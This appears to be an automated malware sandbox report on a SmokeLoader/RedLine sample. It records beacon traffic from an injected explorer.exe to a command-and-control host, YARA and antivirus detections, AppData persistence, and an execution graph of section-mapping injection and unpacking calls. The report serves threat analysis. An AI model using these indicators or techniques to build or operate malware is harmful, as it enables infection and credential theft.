                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.549739190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:56.135561943 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://qakjjulmdxb.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 180
                  Host: nidoe.org
                  Apr 26, 2024 11:49:56.135561943 CEST180OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 07 ad f9
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuZE"QhN`kaiz<|pIwcR_7m;!S(_f6d)D;D7{
                  Apr 26, 2024 11:49:56.765465975 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:56 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.549740190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:02.490715027 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://jljckibghorwl.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 296
                  Host: nidoe.org
                  Apr 26, 2024 11:50:02.490747929 CEST296OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6c 54 c2 fc
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vulT{3yY(JO{<sRcFZCA%5xJ4M}>_qmF:H^>BjpmSKa3)S\N*}qt/"o
                  Apr 26, 2024 11:50:03.125268936 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:02 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.549741190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:07.106115103 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ypaypqoyqmujr.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 125
                  Host: nidoe.org
                  Apr 26, 2024 11:50:07.106133938 CEST125OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 45 c7 85
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vugE[MTQvnn7&d`8FF-3
                  Apr 26, 2024 11:50:07.750643969 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:07 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.549742190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:11.655695915 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xqmcfngarfr.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 229
                  Host: nidoe.org
                  Apr 26, 2024 11:50:11.655695915 CEST229OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 07 c9 b8
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vufmVtMyZ[Bcu3SlDU,}84XJLBHhJ|7w8*/q$yV$X;{gc2Qp
                  Apr 26, 2024 11:50:12.415462971 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:12 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.549743190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:16.085963964 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://crqwqadvlmh.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 348
                  Host: nidoe.org
                  Apr 26, 2024 11:50:16.085999012 CEST348OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 25 e4 80
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuE%a]O^|qN^(w.wp#(lTFULO&bvB+H~LIHGDmiGtI)1X.cu4oI8aPi
                  Apr 26, 2024 11:50:17.080611944 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:16 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.549744190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:23.070924997 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ibixnemdysifgd.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 123
                  Host: nidoe.org
                  Apr 26, 2024 11:50:23.070951939 CEST123OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 32 ef 9b
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuJ2`Bwx_b:VH1+<;1;
                  Apr 26, 2024 11:50:23.940831900 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:23 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.549745190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:28.180860996 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://owewxdswvpurak.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 125
                  Host: nidoe.org
                  Apr 26, 2024 11:50:28.180893898 CEST125OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 53 d7 b6
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vusSBX'*O6fNx=,3
                  Apr 26, 2024 11:50:28.836678982 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:28 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.549746190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:32.759541035 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://oykcjyefevftfd.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 134
                  Host: nidoe.org
                  Apr 26, 2024 11:50:32.759586096 CEST134OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 47 be aa
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu3GRLieY~py|.uoV6I.d
                  Apr 26, 2024 11:50:33.775856972 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:33 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.549747190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:39.540791988 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ybjmbdiflbije.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 149
                  Host: nidoe.org
                  Apr 26, 2024 11:50:39.540822983 CEST149OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 1b fb a5
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuM~(l?V}=e4i&T_pMRIa&85>
                  Apr 26, 2024 11:50:40.280530930 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:40 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.549748190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:44.236303091 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://uwbpryoiwnr.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 282
                  Host: nidoe.org
                  Apr 26, 2024 11:50:44.236303091 CEST282OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 36 f0 b6
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu+6\.kNmERL$3jHOG7j{K,<r;HUVdV:NlWD\d,7eq>oMs{tRBw]]t
                  Apr 26, 2024 11:50:44.900590897 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:44 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.549749190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:49.712608099 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://oycdwmonhjrtmcya.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 253
                  Host: nidoe.org
                  Apr 26, 2024 11:50:49.712645054 CEST253OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 5e f9 91
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuB^uE^\vkaI?OHNt4$XgT_E0E/:m0v3&tvF@+7'+AcJ)z/Zm J3f
                  Apr 26, 2024 11:50:50.460535049 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:50 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.549750190.187.52.42801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:50:57.657191992 CEST282OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://iscsxhjipsydnvm.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 153
                  Host: nidoe.org
                  Apr 26, 2024 11:50:57.657213926 CEST153OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 3a bf 81
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu@:+bps3*`Gf.2ykk6MIb!.VD|4-
                  Apr 26, 2024 11:50:58.315697908 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:50:58 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:11:46:51
                  Start date:26/04/2024
                  Path:C:\Users\user\Desktop\rBwTlpgnjc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\rBwTlpgnjc.exe"
                  Imagebase:0x400000
                  File size:305'152 bytes
                  MD5 hash:EE4E08FEBD22E594C7BCB70EA1B0252A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:11:46:57
                  Start date:26/04/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff674740000
                  File size:5'141'208 bytes
                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:11:47:17
                  Start date:26/04/2024
                  Path:C:\Users\user\AppData\Roaming\ivfjsrs
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\ivfjsrs
                  Imagebase:0x400000
                  File size:305'152 bytes
                  MD5 hash:EE4E08FEBD22E594C7BCB70EA1B0252A
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 44%, Virustotal, Browse
                  Reputation:low
                  Has exited:true

                  Target ID:6
                  Start time:11:50:01
                  Start date:26/04/2024
                  Path:C:\Users\user\AppData\Roaming\ivfjsrs
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\ivfjsrs
                  Imagebase:0x400000
                  File size:305'152 bytes
                  MD5 hash:EE4E08FEBD22E594C7BCB70EA1B0252A
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                  Reset < >

                    Execution Graph

                    Execution Coverage:6.4%
                    Dynamic/Decrypted Code Coverage:18.2%
                    Signature Coverage:29%
                    Total number of Nodes:269
                    Total number of Limit Nodes:10
                    execution_graph 6475 40e400 RtlUnwind 6476 40b001 6477 40b017 ___FrameUnwindToState IsInExceptionSpec ___TypeMatch 6476->6477 6478 40b1d5 RtlEncodePointer 6477->6478 6479 40b13b 6477->6479 6478->6479 6629 40da43 6630 40da51 6629->6630 6634 40da56 6629->6634 6635 40ed03 CreateFileW 6630->6635 6631 40da60 6632 40da67 WriteConsoleW 6632->6631 6634->6631 6634->6632 6635->6634 6689 40d7c7 6690 40d7d3 6689->6690 6691 40d7e4 6690->6691 6697 40d5d2 6690->6697 6695 40d85c 6706 40d899 6695->6706 6700 40d5de ___lock_fhandle 6697->6700 6698 40d62d RtlEnterCriticalSection 6699 40d653 6698->6699 6699->6695 6701 40d8c3 6699->6701 6700->6698 6702 40d8d3 __lseeki64_nolock 6701->6702 6703 40d8db 6702->6703 6704 40d8ec SetFilePointerEx 6702->6704 6703->6695 6704->6703 6705 40d904 GetLastError 6704->6705 6705->6703 6709 40d74d RtlLeaveCriticalSection 6706->6709 6708 40d89f 6708->6691 6709->6708 6342 40c20c 6345 40c21d 6342->6345 6346 40c22f 6345->6346 6353 40e724 6346->6353 6348 40c23b 6349 40c24f 6348->6349 6358 40e5b6 6348->6358 6350 40e724 __forcdecpt_l 8 API calls 6349->6350 6352 40c219 6350->6352 6354 40e730 6353->6354 6355 40e742 6353->6355 6354->6348 6363 40e5e1 6355->6363 6359 40e5c2 6358->6359 6360 40e5d3 6358->6360 6359->6348 6408 40e564 6360->6408 6364 40e5f4 6363->6364 6365 40e600 6364->6365 6367 40e660 6364->6367 6369 40e615 6365->6369 6374 40e10c 6365->6374 6370 40cd77 6367->6370 6369->6348 6371 40cd88 6370->6371 6378 40cb73 6371->6378 6373 40cda9 6373->6369 6375 40e11e 6374->6375 6377 40e12b 6375->6377 6397 40ced3 6375->6397 6377->6369 6379 40cb8c MultiByteToWideChar 6378->6379 6385 40cbf2 6379->6385 6390 40cbeb __freea 6379->6390 6381 40cc51 MultiByteToWideChar 6382 40cc6a 6381->6382 6381->6390 6393 40d47b 6382->6393 6384 40cc7e 6386 40cc94 6384->6386 6384->6390 6391 40ccc0 6384->6391 6385->6381 6385->6390 6387 40d47b __crtLCMapStringA_stat 2 API calls 6386->6387 6386->6390 6387->6390 6388 40d47b __crtLCMapStringA_stat 2 API calls 6389 40cd2b 6388->6389 6389->6390 6392 40cd45 WideCharToMultiByte 6389->6392 6390->6373 6391->6388 6391->6390 6392->6390 6394 40d4a6 __crtLCMapStringA_stat 6393->6394 6395 40d48b LCMapStringEx 6393->6395 6396 40d4bd LCMapStringW 6394->6396 6395->6384 6396->6384 6398 40cee4 6397->6398 6401 40cddb 6398->6401 6400 40ceff 6400->6377 6402 40ce02 MultiByteToWideChar 6401->6402 6403 40cdf5 6401->6403 6405 40ce2e __crtGetStringTypeA_stat 6402->6405 6406 40ce27 __freea 6402->6406 6403->6402 6404 40ce8c MultiByteToWideChar 6404->6406 6407 40cea6 GetStringTypeW 6404->6407 6405->6404 6405->6406 6406->6400 6407->6406 6409 40e575 6408->6409 6410 40e58c 6409->6410 6411 40e10c __isctype_l 3 API calls 6409->6411 6410->6348 6411->6410 6513 4018ce 6514 4018f2 6513->6514 6515 401911 Sleep 6514->6515 6516 4013ed 7 API calls 6515->6516 6517 40192c 6516->6517 6518 4014e2 7 API calls 6517->6518 6519 40193d 6517->6519 6518->6519 6449 4130001 6450 4130005 6449->6450 6455 413092b GetPEB 6450->6455 6452 4130030 6457 413003c 6452->6457 6456 4130972 6455->6456 6456->6452 6458 4130049 6457->6458 6459 4130e0f 2 API calls 6458->6459 6460 4130223 6459->6460 6461 4130d90 GetPEB 6460->6461 6462 4130238 VirtualAlloc 6461->6462 6463 4130265 6462->6463 6464 41302ce VirtualProtect 6463->6464 6466 413030b 6464->6466 6465 4130439 VirtualFree 6467 41304be LoadLibraryA 6465->6467 6466->6465 6469 41308c7 6467->6469 6480 40dc12 6481 40dc1b 6480->6481 6484 40dc26 6480->6484 6482 40dc2e 6483 40dc43 RtlReAllocateHeap 6483->6482 6483->6484 6484->6482 6484->6483 6485 40dca3 GetLastError 6484->6485 6487 40dc8b GetLastError 6484->6487 6485->6482 6487->6482 6684 40c2d3 6686 40c2e6 __controlfp_s 6684->6686 6685 40c2ed 6686->6685 6687 40c2fd RtlEncodePointer 6686->6687 6687->6687 6688 40c317 6687->6688 6307 402e54 6308 402e4a 6307->6308 6310 402ee5 6308->6310 6311 4018c3 6308->6311 6312 4018d1 6311->6312 6313 401911 Sleep 6312->6313 6318 4013ed 6313->6318 6315 40192c 6317 40193d 6315->6317 6330 4014e2 6315->6330 6317->6310 6319 4013ee 6318->6319 6320 40159c NtDuplicateObject 6319->6320 6329 40147f 6319->6329 6321 4015b9 NtCreateSection 6320->6321 6320->6329 6322 401639 NtCreateSection 6321->6322 6323 4015df NtMapViewOfSection 6321->6323 6325 401665 6322->6325 6322->6329 6323->6322 6324 401602 NtMapViewOfSection 6323->6324 6324->6322 6326 401620 6324->6326 6327 40166f NtMapViewOfSection 6325->6327 6325->6329 6326->6322 6328 401696 NtMapViewOfSection 6327->6328 6327->6329 6328->6329 6329->6315 6331 4014f3 6330->6331 6332 40159c NtDuplicateObject 6331->6332 6341 4016b8 6331->6341 6333 4015b9 NtCreateSection 6332->6333 6332->6341 6334 401639 NtCreateSection 6333->6334 6335 4015df NtMapViewOfSection 6333->6335 6337 401665 6334->6337 6334->6341 6335->6334 6336 401602 NtMapViewOfSection 6335->6336 6336->6334 6338 401620 6336->6338 6339 40166f NtMapViewOfSection 6337->6339 6337->6341 6338->6334 6340 401696 NtMapViewOfSection 6339->6340 6339->6341 6340->6341 6341->6317 6573 40b114 6574 40b11c 6573->6574 6577 40b138 6573->6577 6575 40b121 6574->6575 6578 40b154 ___FrameUnwindToState 6574->6578 6581 40b1ad 6575->6581 6579 40b1d5 RtlEncodePointer 6578->6579 6580 40b1e4 6578->6580 6579->6580 6582 40b1c2 6581->6582 6584 40b1e4 6581->6584 6583 40b1d5 RtlEncodePointer 6582->6583 6582->6584 6583->6584 6584->6577 6470 4130005 6471 413092b GetPEB 6470->6471 6472 4130030 6471->6472 6473 413003c 7 API calls 6472->6473 6474 4130038 6473->6474 6636 40de5b 6639 40dd37 6636->6639 6638 40de71 6640 40dd49 6639->6640 6641 40ddf9 WideCharToMultiByte 6640->6641 6643 40dd4d __crtGetStringTypeA_stat 6640->6643 6642 40de29 GetLastError 6641->6642 6641->6643 6642->6643 6643->6638 6412 434afa8 6415 434afb6 6412->6415 6416 434afc5 6415->6416 6419 434b756 6416->6419 6422 434b771 6419->6422 6420 434b77a CreateToolhelp32Snapshot 6421 434b796 Module32First 6420->6421 6420->6422 6423 434b7a5 